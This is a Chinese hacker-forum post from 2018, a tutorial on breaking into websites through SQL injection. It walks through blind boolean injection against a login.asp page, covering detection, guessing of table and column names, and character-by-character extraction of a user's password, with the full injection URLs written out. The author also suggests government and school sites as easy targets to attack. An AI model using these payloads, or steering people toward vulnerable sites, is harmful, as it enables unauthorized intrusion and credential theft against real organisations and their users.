中国黑客论坛,黑客论坛,黑客工具,黑客技术,黑客教程,QQ技术,黑客基地,黑客攻防,黑客软件,定位

 找回密码
 注册会员

QQ登录

只需一步,快速开始

查看: 117|回复: 0

[入侵技术文章] 【黑客技术】如何使用sql注入攻破一个网站?

[复制链接] 分享到朋友圈
   0 UID
   0帖子
   0精华
18
   0威望
500
   0金币
58172
   0贡献
5000
   0阅读权限
   200
   积分
   0
   在线时间
   340 小时
   最后登录
   2018-2-16
发表于 2018-1-11 21:07:03 | 显示全部楼层 |阅读模式
生活圈制作
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
黑客新手常用的sql注入就是使用一些注入工具,比如:啊D,明小子一些的简单sql注入工具。现在的网站能够用sql注入的漏洞已经很少了,一般政府和学校的网站漏洞比较多,可以作为肉鸡试一试。
下面讲一下早些年的sql简单方法:
首先我们在一个具备sql注入漏洞的网站开始实战测试(实验网站已经通知修复)
前提准备:

肉鸡网站:http://172.18.3.13:81/login.asp?name

用户名:admin 密码:admin

所需sql注入语句:

1.判断有无注入点
; and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确

6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

开始sql入侵:
b8f813730cf91f7e670623c87bb5d165.jpg
SQL注入漏洞测试:

在正常用户名admin后增加一个单引号,单击"登录"
或在URL地址栏直接输入http://172.18.3.13:81/login.asp?name=admin'&pass=admin
若出错,证明没有对'进行过滤,存在SQL注入漏洞
5089d155d594e90f82b6fe5e103f8b4c.jpg
在正常用户名admin后增加一个单引号,单击"登录"
3a682c6b6f4ed4f7325698d2125cca15.jpg
出错
53748e07feb9f9bd392317ebc03d837c.jpg
在URL地址栏直接输入http://172.18.3.13:81/login.asp?name=admin'&pass=admin

登录出错
0094af6e6565a6fc5934497d37586af9.jpg
登录出错,证明存在SQL注入漏洞。

3.SQL注入攻击

构造可以正常运行的目标地址

输入http://172.18.3.13:81/login.asp?name=admin &pass=admin' and '1=1
原SQL语句为SELECT * FROM data Where uname='admin',条件未变,但接收密码为admin' and '1=1
登录失败
c36332f3cb18b62e8516dc615c2b2881.jpg
输入http://172.18.3.13:81/login.asp?pass=admin&name=admin' and 1=1 and 'a'='a
原SQL语句为SELECT * FROM data Where uname='admin' and 1=1 and 'a'='a'
登录成功
d614cc244097cc47c3f56e80e1ddcf93.jpg
可以正常运行的目标地址已经构造成功,此时可将1=1部分用SQL查询语句替代,依次对数据库表名、表中字段名、用户和密码长度、用户和密码进行测试

4. 猜解数据库表名

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (select count(*) from data)>0 and 'a'='a
37b626b0dea506048c66c4a21a3ddfb3.jpg
成功,说明数据表名确为data;若不成功,则可反复测试,直至成功猜出表名
5. 猜解数据库字段名

http://172.18.3.13:81/login.asp?pass=admin&name=admin'and (select count(uname) from data)>0 and 'a'='a
若用户名字段确为uname,则提示登录成功
同理可猜出密码字段为upass
fbabbd6557aa15eeb601785ae7aefa36.jpg
猜测用户名字段为name,登录出错
3b533ec3567661ba592f722285c0d763.jpg
猜测用户名字段为uname,登录成功
bea2ba4313d9a576e6dcb2cce78b7bc6.jpg
猜测密码字段为upass,登录成功

说明数据库中密码字段为upass

6.猜解密码长度

已知有一用户名为"wucm",首先猜其密码长度大于1
http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)>1)>0 and 'a'='a
ae98c9803c46517ba51421ad7900e09c.jpg
成功,说明用户"wucm"的密码大于1, 继续猜测密码长度小于10

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)<10)>0 and 'a'='a
b5ff46b394133fa4d7b5322438377127.jpg
成功,说明"wucm"的密码长度小于10位,继续猜测其密码长度小于5

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)<5)>0 and 'a'='a 143bb4eb673d0d767d265efd92b049eb.jpg
出错,说明"wucm"的密码长度大于5位,继续猜测其密码长度大于8位

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)>8)>0 and 'a'='a
a6007998e3a60c80bf3d7499156857e9.jpg
出错,说明"wucm"的密码长度小于8位,继续猜测其密码长度等于6位

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and len(upass)=6)>0 and 'a'='a
69e203f20ab425e66aa8d501e3edbef3.jpg
成功,说明"wucm"的密码长度为6位

7.猜解密码

根据前面的测试我们已经知道该用户的密码长度位6位,接下来对密码进行逐位猜测:

首先测试第一位是否为数字

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)<'9')>0 and 'a'='a
9921e5e152ecb621830597471226f19d.jpg
出错,说明密码第一位不是数字, 测试是否位字母

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)>'a')>0 and 'a'='a
4773735f9deb76f05b8999dcdd2af7e4.jpg
成功,基本说明密码第一位是字母, 接下来重复测试,不断缩小字母范围,最后确定密码第一位为字母"w"

http://172.18.3.13:81/login.asp?pass=admin&name=admin' and (Select count(*) from data where uname='wucm' and mid(upass,1,1)='w')>0 and 'a'='a 76d6e7db6a9c2f78bfd762160b08ac95.jpg
成功,说明密码第一位位"w"

同理对6位密码逐位进行猜测,最后得到密码为"wcm987"

至此我们就猜测出用户"wucm"的密码为"wcm987",进行登陆测试:

76d6e7db6a9c2f78bfd762160b08ac95.jpg

4773735f9deb76f05b8999dcdd2af7e4.jpg

9921e5e152ecb621830597471226f19d.jpg

69e203f20ab425e66aa8d501e3edbef3.jpg

a6007998e3a60c80bf3d7499156857e9.jpg

143bb4eb673d0d767d265efd92b049eb.jpg

b5ff46b394133fa4d7b5322438377127.jpg

ae98c9803c46517ba51421ad7900e09c.jpg

bea2ba4313d9a576e6dcb2cce78b7bc6.jpg

3b533ec3567661ba592f722285c0d763.jpg

fbabbd6557aa15eeb601785ae7aefa36.jpg

37b626b0dea506048c66c4a21a3ddfb3.jpg

d614cc244097cc47c3f56e80e1ddcf93.jpg

c36332f3cb18b62e8516dc615c2b2881.jpg

0094af6e6565a6fc5934497d37586af9.jpg

53748e07feb9f9bd392317ebc03d837c.jpg

3a682c6b6f4ed4f7325698d2125cca15.jpg

5089d155d594e90f82b6fe5e103f8b4c.jpg

b8f813730cf91f7e670623c87bb5d165.jpg

20bb66400f083a9a349442c8d24ca841.gif
您需要登录后才可以回帖 登录 | 注册会员

本版积分规则

小黑屋|中国黑客论坛  

GMT+8, 2018-2-18 11:16 , Processed in 1.204148 second(s), 41 queries .

快速回复 返回顶部 返回列表